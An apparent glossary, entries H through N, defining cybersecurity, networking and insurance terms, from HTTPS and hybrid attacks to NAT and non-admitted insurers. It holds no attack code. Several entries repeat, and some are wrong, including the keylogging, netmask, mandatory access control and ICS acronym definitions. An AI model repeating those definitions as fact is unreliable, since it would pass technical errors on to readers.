HTTP is the underlying protocol used by the World Wide Web (WWW). This protocol defines how messages are formatted and transmitted on the Internet and what actions web servers and browsers should take in response to various commands.
HTTP Proxy
An HTTP Proxy is a server that receives requests from your web browser and then, requests the Internet on your behalf. It then returns the results to your browser.
HTTPS
HTTPS (also called HTTP over TLS, HTTP over SSL, and HTTP Secure) is an Internet protocol used for secure communication over a computer network. HTTPS is especially important over insecure networks (such as public Wi-Fi), as anyone on the same local network can discover sensitive information not protected by HTTPS. HTTPS consists of communication over Hypertext Transfer Protocol (HTTP) within a connection encrypted by Transport Layer Security or its predecessor, Secure Sockets Layer.
HTTPS Scanning
Malware and other threats can hide in encrypted traffic from trusted websites. HTTPS scanning decrypts, scans and then re-encrypts this data.
Hub
A hub is a network device that is a common connection point for devices in a network. These are commonly used to connect segments of a LAN. A hub contains multiple ports. When a data packet is received at one port, it is transmitted to the other ports on the hub.
Hybrid Attack
A hybrid attack is a blend of a dictionary attack method and brute force attack. This means that while a dictionary attack method would include a word list of passwords, the brute-force attack would be applied to each password in that list.
Hybrid Encryption
Hybrid encryption is a method of encryption that combines two or more encryption algorithms or systems. This method merges asymmetric and symmetric encryption to derive benefit from the strengths of each form of encryption. These strengths include speed and security, respectively.
Hybrid Security Control
Hybrid security control is a security control that is implemented in an information system in part as a common control and in part as a system-specific control.
Hyperlink
A hyperlink (usually highlighted by color or underscoring) could be a word, a phrase, or an image that refers to data or related information that the user can directly follow either by clicking or by hovering. A hyperlink points to a whole document or to a specific element within a document while a hypertext is text with hyperlinks.
Hypertext Markup Language
Hypertext Markup Language (HTML) is a set of markup symbols or codes inserted in a file intended for display on a World Wide Web (WWW) browser page. These markups state the browser how to display a web page to the user.
Hypertext Transfer Protocol
HTTP is the underlying protocol used by the World Wide Web (WWW). This protocol defines how messages are formatted and transmitted on the Internet and what actions web servers and browsers should take in response to various commands.
I
Identity
Internet identity (IID) or internet persona is a social identity that an Internet user creates on online communities and websites. While some users prefer using their real names online, others prefer to be anonymous and identify themselves by means of pseudonyms.
Identity theft
Identity theft occurs when someone gains unauthorized access to personal, identifying information and uses it maliciously. Someone committing identity theft may use the victim’s information to open new accounts, steal money, and damage their credit.
Incident
An incident is an unplanned disruption or degradation of a network or system service and needs to be resolved immediately. An example of an incident is a server crash that causes a disruption in the business process. However, if the disruption is planned, say, a scheduled maintenance, it is not an incident.
Incident Handling
Incident handling is an action plan developed (by an organization or individual) to counteract intrusions, cyber-theft, denial of service, fire, flood, and any other security-related events. It comprises of six process steps: preparation, identification of attack, containment of attack, eradication, recovery, and analysis (lessons learned documentation).
Incident Response Plan
An organized approach to address and manage the aftermath of a cyber-attack or an incident. The goal is to limit damage and reduce recovery time and costs.
Incontestability Provision
a life insurance and annuity provision limiting the time within which the insurer has the legal right to void the contract on grounds of material misrepresentation in the policy application.
Incremental Backups
An incremental backup provides a backup of only those files that have changed, modified, or are new since the last backup. Incremental backups are often desirable as they consume minimum storage and are quicker to perform than differential backups.
Incurred but Not Reported
(Pure IBNR) claims that have occurred, but the insurer has not been notified of them at the reporting date. Estimates are established to book these claims. May include losses that have been reported to the reporting entity but have not yet been entered into the claims system or bulk provisions. Bulk provisions are reserves included with other IBNR reserves to reflect deficiencies in known case reserves. IBNR can sometimes include estimates of incurred but Not Enough Reported (IBNER)
Incurred Claims
paid claims plus amounts held in reserve for those that have been incurred but not yet paid.
ICMP
The Internet Control Message Protocol (ICMP) is one of the key Internet protocols and is used by network devices such as routers to generate error messages to the source IP address when network problems prevent delivery of IP packets. Any IP network device can send, receive or process ICMP messages. This protocol is also used to relay query messages and is assigned protocol number 1.
ICS
Industrial Control System (IDC) is a collective term used to describe different types of control systems and associated instrumentation, which includes the devices, systems, networks, and controls used to operate and/or automate industrial processes.
IETF
The Internet Engineering Task Force (IETF) is a large open international community of network designers, operators, vendors, and researchers who are concerned with the evolution of the Internet architecture and its smooth operations. This body defines the standard Internet operating protocols such as TCP/IP. The IETF is supervised by the Internet Society Internet Architecture Board (IAB). The Internet Assigned Numbers Authority (IANA) is the central coordinator for the assignment of unique parameter values for Internet protocols.
IMAP
The Internet Message Access Protocol (IMAP) is a standard Internet protocol used by e-mail clients to retrieve e-mail messages from a mail server over TCP/IP. IMAP is defined by RFC 3501. An IMAP server typically listens on port number 143. IMAP over SSL (IMAPS) is assigned port number 993.
Incurred Losses
sustained losses, paid or not, during a specified time period. Incurred losses are typically found by combining losses paid during the period with unpaid losses sustained during the time period minus outstanding losses at the beginning of the period incurred in the previous period.
Indemnity, Principle of
a general legal principle related to insurance that holds that the individual recovering under an insurance policy should be restored to the approximate financial position he or she was in prior to the loss. The legal principle limiting compensation for damages is equivalent to the losses incurred.
Independent Adjuster
freelance contractor paid a fee for adjusting losses on behalf of companies.
Independent Agent
a representative of multiple insurance companies who sells and services policies for records which they own and operate under the American Agency System.
Independent Contractor
an individual who is not employed for a company but instead works for themselves providing goods or services to clients for a fee.
Index Annuity
an interest-bearing fixed annuity tied to an equity index, such as the Dow Jones Industrial Average or S & P 500.
Individual Annuities- Deferred Non-Variable and Variable
an annuity contract that provides an accumulation based on both (1) funds that accumulate based on a guaranteed crediting interest rates or additional interest rate applied to designated considerations, and (2) funds where the accumulation varies in accordance with the rate of return of the underlying investment portfolio selected by the policyholder. The contract provides for the initiation of payments at some designated future date.
Individual Annuities- Immediate Non-Variable and Variable
an annuity contract that provides an accumulation based on both (1) funds that accumulate based on a guaranteed crediting interest rates or additional interest rate applied to designated considerations, and (2) funds where the accumulation varies in accordance with the rate of return of the underlying investment portfolio selected by the policyholder. The contract provides for the initiation of payments at some interval that may vary, however the annuity payouts must begin within 13 months.
Individual Credit- Credit Disability
makes monthly loan/credit transaction payments to the creditor upon the disablement of an insured debtor.
Individual Credit- Life
contracts sold in connection with loan/credit transactions or other credit transactions, which do not exceed a stated duration and/or amount and provide insurance protection against death.
Individual Health
health insurance where the policy is issued to an individual covering the individual and/or their dependents in the individual market. This includes conversions from group policies.
Industrial Control System
Industrial Control System (IDC) is a collective term used to describe different types of control systems and associated instrumentation, which includes the devices, systems, networks, and controls used to operate and/or automate industrial processes.
Industrial Life
Industrial life insurance, also called "debit" insurance, is insurance under which premiums are paid monthly or more often, the face amount of the policy does not exceed a stated amount, and the words "industrial policy" are printed in prominent type on the face of the policy.
Inetd
Inetd stands for Internet Service Daemon and is a super-server daemon on many Unix systems to manage several Internet services. This reduces the load of the system. This means that network services such as telnet, File Transfer Protocol (FTP), and Simple Mail Transfer Protocol (SMTP) can be activated on demand rather than running continuously.
Inference Attack
An inference attack is a data mining technique used to illegally access information about a subject or database by analyzing data. This is an example of breached information security. Such an attack occurs when a user can deduce key or critical information of a database from trivial information without directly accessing it.
Information security (InfoSec)
InfoSec stands for information security. It refers to a subcategory of cybersecurity that focuses on the practices, systems, and processes used to protect sensitive information.
Information Warfare
Information Warfare (IW) is primarily a United States Military concept that involves the use and management of information and communication technology in pursuit of a competitive advantage over an opponent. This concept may employ a combination of tactical information, assurance(s) that the information is valid, spreading of propaganda or disinformation to demoralize or manipulate the enemy and the public, undermining the quality of opposing force information and denial of information-collection opportunities to opposing forces.
Ingress Filtering
Ingress filtering is used to ensure that all incoming packets (of data) are from the networks from which they claim to originate. Network ingress filtering is a commonly used packet filtering technique by many Internet service providers to prevent any source address deceiving. This helps in combating several net abuse or crimes by making Internet traffic traceable to its source.
Input Validation Attacks
Input Validations Attacks are when an attacker purposefully sends strange inputs to confuse a web application. Input validation routines serve as the first line of defense for such attacks. Examples of input validation attacks include buffer overflow, directory traversal, cross-site scripting, and SQL injection.
Insider Threat
An insider threat is a malicious threat to an organization that comes from people within the organization.
Insurable Interest
A right or relationship regarding the subject matter of the insured contract such that the insured can suffer a financial loss from damage, loss, or destruction. (Bickelhaupt and Magee)
Insurance
an economic device transferring risk from an individual to a company and reducing the uncertainty of risk via pooling.
Insurance Holding Company System
consists of two or more affiliated persons, one or more of which is an insurer.
Insurance Regulatory Information System (IRIS)
a baseline solvency screening system for the National Association of Insurance Commissioners (NAIC) and state insurance regulators established in the mid-1970s.
Insurance to Value
Amount of insurance purchased vs. the actual replacement cost of the insured property expressed as a ratio.
Insured
party(ies) covered by an insurance policy.
Insurer
an insurer or reinsurer authorized to write property and/or casualty insurance under the laws of any state.
Integrity
The integrity of a system or network is the assurance that information can only be accessed or modified by those who are authorized. Several measures are taken to ensure integrity. These include controlling the physical environment of networked terminals and servers, restricting access to data, and maintaining rigorous authentication practices. Data integrity can be threatened by environmental hazards, such as heat, dust, and electrical surges.
Integrity Star Property
Integrity Star Property means a user cannot access or read data of a lower integrity level than their own.
Intermediary
a person, corporation, or other business entity (not licensed as a medical provider) that arranges, by contracts with physicians and other licensed medical providers, to deliver health services for a health insurer and its enrollees via a separate contract between the intermediary and the insurer.
International
includes all business transacted outside the U.S. and its territories and possessions where the appropriate line of business is not determinable.
Internet
The Internet is the worldwide network of interconnected computers that use the Internet protocol suite (or TCP/IP) to link billions of devices across globally. It carries an extensive range of information resources and services, such as the inter-linked hypertext documents and applications of the World Wide Web (WWW), electronic mail, telephony, and peer-to-peer networks for file sharing.
Internet Control Message Protocol
The Internet Control Message Protocol (ICMP) is one of the key Internet protocols and is used by network devices such as routers to generate error messages to the source IP address when network problems prevent delivery of IP packets. Any IP network device can send, receive or process ICMP messages. This protocol is also used to relay query messages and is assigned protocol number 1.
Internet Engineering Task Force
The Internet Engineering Task Force (IETF) is a large open international community of network designers, operators, vendors, and researchers who are concerned with the evolution of the Internet architecture and its smooth operations. This body defines the standard Internet operating protocols such as TCP/IP. The IETF is supervised by the Internet Society Internet Architecture Board (IAB). The Internet Assigned Numbers Authority (IANA) is the central coordinator for the assignment of unique parameter values for Internet protocols.
Internet Liability
Coverage for cyber commerce includes copyright infringement, libel, and violation of privacy.
Internet Message Access Protocol
The Internet Message Access Protocol (IMAP) is a standard Internet protocol used by e-mail clients to retrieve e-mail messages from a mail server over TCP/IP. IMAP is defined by RFC 3501. An IMAP server typically listens on port number 143. IMAP over SSL (IMAPS) is assigned port number 993.
Internet of Things
Internet of Things (IoT) is essentially everyday objects in your business or house that are connected to the Internet.
Internet Protocol
The Internet Protocol (IP) is a communication protocol used for relaying datagrams across network boundaries. It has a routing function which enables inter-networking and establishes the Internet.
Internet Standard
An Internet Standard (STD) is a normative specification (approved by the IESG and published as an RFC) of a technology or methodology applicable to the Internet. Internet Standards are created and published by the Internet Engineering Task Force (IETF). An Internet Standard is characterized by technical reliability and usefulness. The IETF also defines a proposed standard as a less mature but stable and well-reviewed specification.
Internet Worm
Worms are a form of malware that replicates across the Internet or local networks.
Interrupt
An Interrupt is a signal sent to the processor by hardware or software indicating an event that needs immediate attention.
Intranet
An intranet is a private network accessible only to an organization's staff.
Intrusion
Unauthorized act of bypassing the security mechanisms of a network or information system.
Intrusion Detection
Intrusion Detection is a security management system for computers and networks. An ID system gathers and analyses information about a computer or a network to identify possible security breaches which include both intrusions and misuse. This system uses vulnerability assessment, a technology developed to assess the security of a computer system or network.
Intrusion Prevention System
Intrusion Prevention System (IPS) is a network security system designed to prevent malicious activity.
Investment Grade
The obligation has been determined to be in one of the top four generic lettered rating classifications by a securities rating agency acceptable to the commissioner, that the obligation has been identified in writing by such a rating agency to be of investment grade quality, or, if the obligation has not been submitted to any such rating agency, that the obligation has been determined to be investment grade (Class 1 and Class 2) by the Securities Valuation Office of the National Association of Insurance Commissioners.
Investment Income Accrued
investment income earned as of the reporting date but not legally due to be paid to the reporting entity until after.
Investment Income Due
investment income earned and legally due to be paid to the reporting entity as of the reporting date.
Investment Income Gross
shall be recorded as earned and shall include investment income collected during the period, the change in investment income due and accrued, the change in unearned investment income plus any amortization (e.g., discounts or premiums on bonds, origination fees on mortgage loans, etc.)
IoT
Internet of Things (IoT) is essentially everyday objects in your business or house that are connected to the Internet.
IP
The Internet Protocol (IP) is a communication protocol used for relaying datagrams across network boundaries. It has routing function which enables inter-networking, and essentially establishes the Internet.
IP Address
An Internet Protocol address (IP address) is a logical numeric address assigned to a device part of a TCP/IP-based network.
Internet Protocol Address
An Internet Protocol address (IP address) is a logical numeric address assigned to a device part of a TCP/IP-based network.
IPS
Intrusion Prevention System (IPS) is a network security system designed to prevent malicious activity.
IPsec
Internet Protocol Security (IPsec) is a framework of open standards for ensuring private, secure communications over Internet Protocol (IP) networks, through cryptographic security services.
IP Flood
IP Flood is a type of Denial-of-Service attack where the victim or system is flooded with information that uses up all the available bandwidth and prevents legitimate users from access. When IP Flood Detection is enabled, the router can block malicious devices attempting to flood devices.
IP Forwarding
IP forwarding is also known as Internet routing which is a process used to determine which path a packet or datagram will be sent to.
IP Spoofing
IP Spoofing is also known as IP address forgery or a host file hijack. It is a hijacking technique where a hacker impersonates a trusted host to conceal his identity, spoof a Web site, hijack browsers, or gain access to a network.
IPS
Intrusion prevention systems (IPS) monitor networks and systems for malicious activity.
IPsec
IPsec authenticates and encrypts each Internet Protocol (IP) packet of a communication session.
Irrevocable Beneficiary
a life insurance policy beneficiary who has a vested interest in the policy proceeds even during the insured's lifetime because the policy owner has the right to change the beneficiary designation only after obtaining the beneficiary's consent.
ISO
The International Organization for Standardization (ISO) is an international standard-setting body composed of voluntary representatives from various national standards organizations.
Issue-Specific Policy
An Issue-Specific Policy is intended to address specific needs within an organization, such as a password policy.
ITU-T
The ITU Telecommunication Standardization Sector (ITU-T) is one of the three sectors of the International Telecommunication Union (ITU). It coordinates standards for telecommunications. The International Telegraph and Telephone Consultative Committee (CCITT, from French: Comité Consultatif International Téléphonique et Télégraphique) was created in 1956 and was renamed ITU-T in 1993. ITU became a United Nations specialized agency in 1947.
J
Jitter
Jitter is any deviation in, or displacement of, the signal pulses in a high-frequency digital signal. The aberration can be in amplitude, phase timing, or the width of the signal pulse. Jitter is sometimes referred to as “Packet Delay Variation,” or PDV. Controlling jitters is critical for a good online experience.
Joint and Last Survivor Annuity
retirement plan that continues to payout so long as at least one of two or more annuitants is alive.
Joint-Life Annuity
an annuity contract that ceases upon the death of the first of two or more annuitants.
Joint Underwriting Association (JUA)
a loss-sharing mechanism combining several insurance companies to provide extra capacity due to type or size of exposure.
Jump Bag
A Jump Bag is a container that has all the items necessary to respond to an incident inside to help mitigate the effects of delayed reactions.
K
Kerberos
Kerberos is a computer network authentication protocol and is ticket-based allowing nodes to communicate over a non-secure. Massachusetts Institute of Technology (MIT) developed Kerberos to protect network services provided by Project Athena. This protocol is based on the earlier Needham–Schroeder symmetric key protocol. Kerberos protocol messages are protected against snooping and replay attacks.
Kernel
The kernel is an essential center of a computer operating system, the core that provides basic services for all other parts of the operating system. A synonym is nucleus. A kernel can be contrasted with a shell, the outermost part of an operating system that interacts with user commands. Kernel and Shell are terms used more frequently in Unix operating systems than in IBM mainframe or Microsoft Windows systems.
Key Pair
Every digital certificate has a pair of associated cryptographic keys. This pair of keys consists of a private key and a public key.
Key-Persons Insurance
a policy purchased by, for the benefit of, a business insuring the life or lives of personnel integral to the business operations.
Keylogging
A process of secretly recording keystrokes by an authorized 3rd party.
Kidnap/Ransom Insurance
Coverage for ransom or extortion costs and related expenses.
L
L2F
Layer 2 Forwarding Protocol (L2F) is an Internet protocol, originally developed by Cisco Corporation, that uses tunnelling of PPP over IP to create a virtual extension of a dial-up link across a network, initiated by the dial-up server and transparent to the dial-up user.
L2TP
An extension of the Point-to-Point Tunneling Protocol used by an Internet service provider to enable the operation of a virtual private network over the Internet.
Lapse
termination of a policy due to failure to pay the required renewal premium.
Lattice Techniques
Lattice Techniques use security designations to determine access to information.
Layer 2 Forwarding Protocol
Layer 2 Forwarding Protocol (L2F) is an Internet protocol, originally developed by Cisco Corporation, that uses tunnelling of PPP over IP to create a virtual extension of a dial-up link across a network, initiated by the dial-up server and transparent to the dial-up user.
Layer 2 Tunneling Protocol
An extension of the Point-to-Point Tunneling Protocol used by an Internet service provider to enable the operation of a virtual private network over the Internet.
LDAP
Lightweight Directory Access Protocol (LDAP) is an open, vendor-neutral, industry standard application protocol used for accessing and maintaining distributed directory information services over an IP network.
Least Privilege
Least Privilege is the principle of allowing users or applications the least number of permissions necessary to perform their intended function.
Legion
A Legion is a software used to detect unprotected shares.
Level Premium Insurance
life insurance policy for which the cost is equally distributed over the term of the premium period, remaining constant throughout.
Liability
a certain or probable future sacrifice of economic benefits arising from present obligations of a particular entity to transfer assets or to provide services to other entities in the future as a result of a past transactions(s) or event(s). three essential characteristics: a) It embodies a present duty or responsibility to one or more other entities that entails settlement by probable future transfer or use of assets at a specified or determinable date, on occurrence of a specified event, or on demand; b) The duty or responsibility obligates a particular entity, leaving it little or no discretion to avoid the future sacrifice; and c) The transaction or other event obligating the entity has already happened.
Life- Endowment
Insurance that pays the same benefit amount should the insured die during the term of the contract, or if the insured survives to the end of the specified coverage term or age.
Life- Flexible Premium Adjustable Life
A group life insurance that provides a face amount that is adjustable to the certificate holder and allows the certificate holder to vary the modal premium that is paid or to skip a payment so long as the certificate value is sufficient to keep the certificate in force, and under which separately identified interest credits (other than in connection with dividend accumulation, premium deposit funds or other supplementary accounts) and mortality and expense charges are made to individual certificates while providing minimum guaranteed values.
Life Settlements
A contract or agreement in which a policyholder agrees to sell or transfer ownership in all or part of a life insurance policy to a third party for compensation that is less than the expected death benefit of a policy.
Lifetime Disability Benefit
a provision in some disability income policies to recoup lost wages for the term of disability or remainder of insured's life in case of permanent disability.
Lightweight Directory Access Protocol
Lightweight Directory Access Protocol (LDAP) is an open, vendor-neutral, industry standard application protocol used for accessing and maintaining distributed directory information services over an IP network.
Limits
Maximum value to be derived from a policy.
Line of Business
Classification of business written by insurers.
Link State
Link-state routing protocols are one of the two main classes of routing protocols used in packet switching networks. The link-state protocol is performed by every switching node in the network. Every node creates a map of the connectivity to the network (in the form of a graph) displaying all the nodes that are connected to other nodes. Each node then calculates the next best logical path from it to every possible destination in the network. The collection of these best paths forms the node’s routing table.
List Based Access Control
List Based Access Control associates a list of users and their privileges with each object, such as a file directory or individual file. Each object has a security attribute that identifies its access control list. The list has an entry for each system user with access privileges. This list is implemented differently by each operating system.
LKM
Loadable Kernel Modules (LKM) is an object file that contains code to extend the running kernel or the base kernel of an operating system. LKMs are usually used to add support for new hardware and/or file systems, and even for adding system calls.
Loadable Kernel Modules
Loadable Kernel Modules (LKM) is an object file that contains code to extend the running kernel or the base kernel of an operating system. LKMs are usually used to add support for new hardware and/or file systems, and even for adding system calls.
Log Clipping
Log clipping is the selective removal of log entries from a system log to hide a compromise.
Logic Bomb
A logic bomb is a piece of malicious code intentionally inserted into a software system that will run when specified conditions are met.
Logic Bombs
A logic bomb is a piece of code that is deliberately inserted into a system to trigger a malicious program. Viruses and worms often contain logic bombs that execute a certain payload at a pre-defined time or when some other condition is met. Some viruses attack their host systems on specific dates, such as Friday the 13th or April Fools’ Day. Trojans that activate on certain dates are often called Time Bombs
Logic Gate
A logic gate is an elementary building block of a digital circuit. This device is used to implement a Boolean function. It performs a logical operation on one or more logical inputs and produces a single logical output.
Loopback Access
A Loopback Address is a pseudo address that sends outgoing signals back to the same computer for testing. In a TCP/IP network, the loopback IP address is 127.0.0.1, and pinging this address always returns a reply unless the firewall prevents it.
Loss Adjustment Expense (LAE)
Expected payments for costs to be incurred in connection with the adjustment and recording of losses. Can be classified into two broad categories: Defense and Cost Containment (DCC) and Adjusting and Other (AO). Can also be separated into (Allocated Loss Adjustment Expense) and (Unallocated Loss Adjustment Expense for ratemaking purposes.
Loss of Frequency
Incidence of claims on a policy during a premium period.
Loss of Payable Clause
Coverage for third party mortgage in case of default on insured property, secured by a loan, that has been lost or damaged.
Loss of Use Insurance
Policy providing protection against loss of use due to damage or destruction of property.
Loss Ratio
The percentage of incurred losses to earned premiums.
Loss Reserve
The amount that insurers set aside to cover claims incurred but has not yet been paid.
Loss Reserves
An estimate of liability or provision in an insurer's financial statement, indicating the amount the insurer expects to pay for losses incurred but not yet reported or reported claims that haven't been paid.
Mobile Device Management
Mobile device management (MDM) is an industry term for the administration of mobile devices, such as smartphones, tablet computers, laptops, and desktop computers.
Losses Incurred
Includes claims that have been paid and/or have amounts held in reserve for future payment.
Losses Incurred but Not Reported
An estimated amount set aside by the insurance company to pay claims that may have occurred, but for some reason has not yet been reported to the insurance company.
M
MAC
Mandatory Access Control (MAC) is a security approach that contains the ability of an individual resource owner to grant or deny access to resources or files on the system. Whenever a user tries to access an object, an authorization rule is enforced by the OS. Kernel examines these security aspects and decides whether the user can access or not. Any operation by any user is typically tested against a set of authorization rules (aka policy) to determine if the operation is allowed.
MAC Address
Media access control address (MAC address) of a device is a unique identifier assigned to a network interface.
Media access control address
Media access control address (MAC address) of a device is a unique identifier assigned to a network interface.
MAC Address
A Media Access Control address (MAC address) is also known as the physical address and is a unique identifier assigned to the network interface for communication. MAC addresses are generally used as a network address for most IEEE 802 network technologies (including Ethernet and Wi-Fi). MAC addresses are used in the media access control protocol sub-layer of the OSI reference model.
Malicious Code
Malicious code is any code in any part of a software system or script that is intended to cause undesired effects, security breaches, or damage to a system. Such codes gain unauthorized access to system resources or trick a user into executing other malicious logic. Malicious code describes a broad category of system security terms that includes attack scripts, viruses, worms, Trojan horses, backdoors, and malicious active content.
Malware
Malware is a contraction of malicious and software. Malware is any piece of software written to harm data, devices, or people. This included viruses, worms, trojans, spyware, and ransomware.
Mandatory Access Control
Mandatory Access Control (MAC) is a security approach that contains the ability of an individual resource owner to grant or deny access to resources or files on the system. Whenever a user tries to access an object, an authorization rule is enforced by the OS. Kernel examines these security aspects and decides whether the user can access or not. Any operation by any user is typically tested against a set of authorization rules (aka policy) to determine if the operation is allowed.
Manufacturers Output Policies
Provides broad form coverage of personal property of an insured manufacturer including raw material, goods in process, finished goods and goods shipped to customers.
Margin Premium
A deposit an organization must maintain with a broker regarding the Futures Contracts purchased or sold.
Market Value
Fair value or the price that could be derived from current sale of an asset.
Masquerade Attack
A masquerade attack is any attack that uses a forged identity (such as a network identity) to gain unofficial access to a personal or organizational computer. Masquerade attacks are generally performed by using either stolen passwords and logons, locating gaps in programs, or finding a way around the authentication process. Such attacks are triggered either by someone within the organization or by an outsider if the organization is connected to a public network.
MD5
The MD5 was designed by Professor Ronald L. Rivest of MIT in 1991. The MD5 message-digest algorithm is the most widely used cryptographic hash function producing a 128-bit (16-byte) hash value, typically expressed in text format as a 32-digit hexadecimal number. It was developed to be used with digital signature applications that require large files to be compressed by a secure method before being encrypted with a secret key, under a public key cryptosystem. MD5 is currently a standard, Internet Engineering Task Force (IETF) Request for Comments (RFC) 1321.
MDM
Mobile device management (MDM) is an industry term for the administration of mobile devices, such as smartphones, tablet computers, laptops, and desktop computers.
Measures of Effectiveness
Measures of Effectiveness (MOE) is a probability model based on engineering concepts that allows one to estimate the impact of a given action on an environment. MOE quantifies the results to be obtained by a system and may be expressed as probability that the system will perform as required.
MFA
Multi-factor authentication (MFA) is a method of confirming a user's claimed identity only after presenting two or more pieces of evidence across three main categories: what you know, what you have and what you are.
Minimum Premium Plan
An arrangement under which an insurance carrier will, for a fee, handle the administration of claims and insure against large claims for a self-insured group. The employer self-funds a fixed percentage (e.g., 90%) of the estimated monthly claims, and the insurer covers the remainder.
Mobile Device Security
Mobile device security refers to the policies, procedures, and tools for securing mobile devices.
Mobile Phone Malware
Mobile phone malware is malware intended to run on mobile devices, such as smartphones or PDAs.
Modified Guaranteed
An annuity that contains a provision that adjusts the value of withdrawn funds based on a formula in the contract. The formula reflects market value adjustments.
MOE
Measures of Effectiveness (MOE) is a probability model based on engineering concepts that allows one to estimate the impact of a given action on an environment. MOE quantifies the results to be obtained by a system and may be expressed as probability that the system will perform as required.
Monoculture
Monoculture is where many users run the same software and are vulnerable to the same attacks.
Moral Hazard
Personality characteristics that increase the probability of losses. For example, not taking proper care to protect insured property because the insured knows the insurance company will replace it if it is damaged or stolen.
Morris Worm
The Morris Worm (or Internet worm) program was written by a graduate student at Cornell University, Robert Tappan Morris, and launched on November 2, 1988, from MIT. It was the first computer worm distributed via the Internet and gained significant mainstream media attention.
Multi-Cast
An IP multi-cast is a method of sending packets of data to a group of receivers in a single transmission. This method is often used to stream media applications on the Internet and private networks.
Multi-Factor Authentication
Multi-factor authentication (MFA) is a method of confirming a user's claimed identity only after presenting two or more pieces of evidence across three main categories: what you know, what you have and what you are.
Multi-Homed
Multi-homed is any computer host that has multiple IP addresses to connected networks. A multi-homed host is physically connected to multiple data links that can be on the same or different networks. Multihoming is commonly used in Web management for load balancing, redundancy, and disaster recovery.
Multi-Peril Insurance
Personal and business property coverage combining several types of property insurance in one policy.
Multiplexing
Multiplexing is a technique by which multiple analog or digital data streams are combined into one signal over a shared medium. Multiplexing originated in telegraphy in the 1870s and is now widely applied in communications. The multiplexed signal is transmitted over a communication channel, such as a cable. A reverse process, known as demultiplexing, extracts the original channels on the receiver end.
Municipal Body Guarantee Insurance
Coverage sold to municipalities to guarantee the principal payment on bonds issued.
Municipal Liability
Liability coverage for the acts of a municipality.
Municipal Obligation Bond
Any security, or other instrument, including a state lease but not a lease of any other governmental entity, under which a payment obligation is created, issued by or on behalf of a governmental unit to finance a project servicing a substantial public purpose, and 1) Payable from tax revenues, but not tax allocations, within the jurisdiction of such governmental unit; 2) Payable or guaranteed by the United States of America or any agency, department or instrumentality thereof, or by a state housing agency; 3) Payable from rates or charges (but not tolls) levied or collected in respect of a non-nuclear utility project, public transportation facility (other than an airport facility) or public higher education facility; or 4) With respect to lease obligations, payable from future appropriations.
Mutual Insurance Company
A privately held insurer owned by its policyholders, operated as a non-profit that may or may not be incorporated.
Mutual Insurance Holding Company
A company is organized as a mutual and owning a capital stock insurer or insurers for the benefit of pooling risk for many people, typically those in the same industry.
N
NAC
Network Access Control (NAC) solutions help organizations control access to their networks.
Named Insurance
the individual defined as the insured in the policy contract.
Named Peril Coverage
Insurance for losses explicitly defined in the policy contract.
NAT
Network Address Translation (NAT) is an approach that is used to remap an IP address space into another by modifying network address information in IP datagram packet headers while they are in transit. This technique was originally used for rerouting traffic in IP networks without renumbering every host. Typically, home, or small business networks use NAT to share a single DLS or Cable modem IP address. However, in some cases NAT is used for servers as an additional layer of protection.
National Association of Insurance Commissioners (NAIC)
The U.S. standard-setting and regulatory support organization created and governed by the chief insurance regulators from the 50 states, the District of Columbia and five U.S. territories. Through the NAIC, state insurance regulators establish standards and best practices, conduct peer review, and coordinate their regulatory oversight. NAIC staff supports these efforts and represents the collective views of state regulators domestically and internationally. NAIC members, together with the central resources of the NAIC, form the national system of state-based insurance regulation in the U.S.
National Institute of Standards and Technology
The National Institute of Standards and Technology (NIST) is a non-regulatory federal agency within the U.S. Department of Commerce. NIST’s mission is to promote U.S. innovation and industrial competitiveness by advancing measurement science, standards, and technology in ways that enhance economic security and improve our quality of life.
Nationally Recognized Statistical Rating Organization (NRSRO)
Refers to rating organizations so designated by the SEC whose status has been confirmed by the Securities Valuation Office. Examples are Moody's Investors Service, Inc., Standard & Poor's (S&P), A.M. Best Company (A.M. Best) and Fitch Ratings and Dominion Bond Rating Service (DBRS).
Natural Disaster
Natural disasters are any act of God or natural event caused by environmental factors. Some examples of these disasters include fire, flood, earthquake, lightning, or wind and disables the system, part of it, or a network of systems.
Negligence
failure to exercise reasonable consideration resulting in loss or damage to oneself or others.
Net Admitted Assets
Total of assets whose values are permitted by state law to be included in the annual statement of the insurer.
Net Income
Total revenues from an insurer's operations fewer total expenses and income taxes.
Net Premiums Earned
Premiums on property/casualty or health policies that will not have to be returned to the policyholder if the policy is cancelled.
Netmask
A netmask is a string of 0’s and 1’s that screen out the network part of an IP address so that only the host computer part of the address remains. The binary 1’s at the beginning of the mask turns the network ID part of the IP address into 0’s. The binary 0’s that follow allow the host ID to remain. In a netmask, two bits are always automatically assigned. For example, in 255.255.225.0, “0” is the assigned network address, and in 255.255.255.255, “255” is the assigned broadcast address. The 0 and 255 are always assigned and cannot be used.
Network Access Control
Network Access Control (NAC) solutions help organizations control access to their networks.
Network-Based IDS
Network-based Intrusion Detection Systems (NIDS) are placed at a strategic point (or points) to monitor the traffic on the network. It analyses the passing traffic on the entire subnet and matches the traffic that is passed on the subnets to the library of known attacks. When an attack is identified, or abnormal behavior is detected, an alert is sent to the administrator. OPNET and NetSim are commonly used tools for simulation network intrusion detection systems.
Network Infrastructure
A mix of hardware and software resources of a network to enable network connectivity, communication, operations, and management of your network.
Network Mapping
Network mapping is the study of physical connectivity of networks. It is used to compile an electronic inventory of the systems and the services on any network. With the increase in complexities of networks, automated network mapping has become more popular.
Network Segregation
A method to split a network into subnetwork into different network segments or zones which provide security benefits.
Network Taps
Network taps are hardware devices that help in accessing the data flow across a computer network. It is also desirable for a third party to monitor the traffic between two points in the network. The network tap has (at least) three ports, an A port, a B port, and a monitor port. Network taps are generally used for network intrusion detection systems, VoIP recording, network probes, RMON probes, packet sniffers, and other monitoring and collection devices and software that require access to a network segment.
NIST
The National Institute of Standards and Technology (NIST) is a non-regulatory federal agency within the U.S. Department of Commerce. NIST’s mission is to promote U.S. innovation and industrial competitiveness by advancing measurement science, standards, and technology in ways that enhance economic security and improve our quality of life.
Non-Admitted Assets
Assets having economic value other than those which can be used to fulfill policyholder obligations, or those assets which are unavailable due to encumbrances or other third-party interests and should not be recognized on the balance sheet.
Non-Admitted Insurer
Insurance company not licensed to do business within a given state.
Non-Controlled Stock Insurers
Insurers in which a parent company has: 1) a financial interest represented by the direct or indirect ownership of less than 50% of voting shares, and 2) does not have the ability to exercise control over the insurer, e.g., through voting stock or management contract.
Non-Printable Character
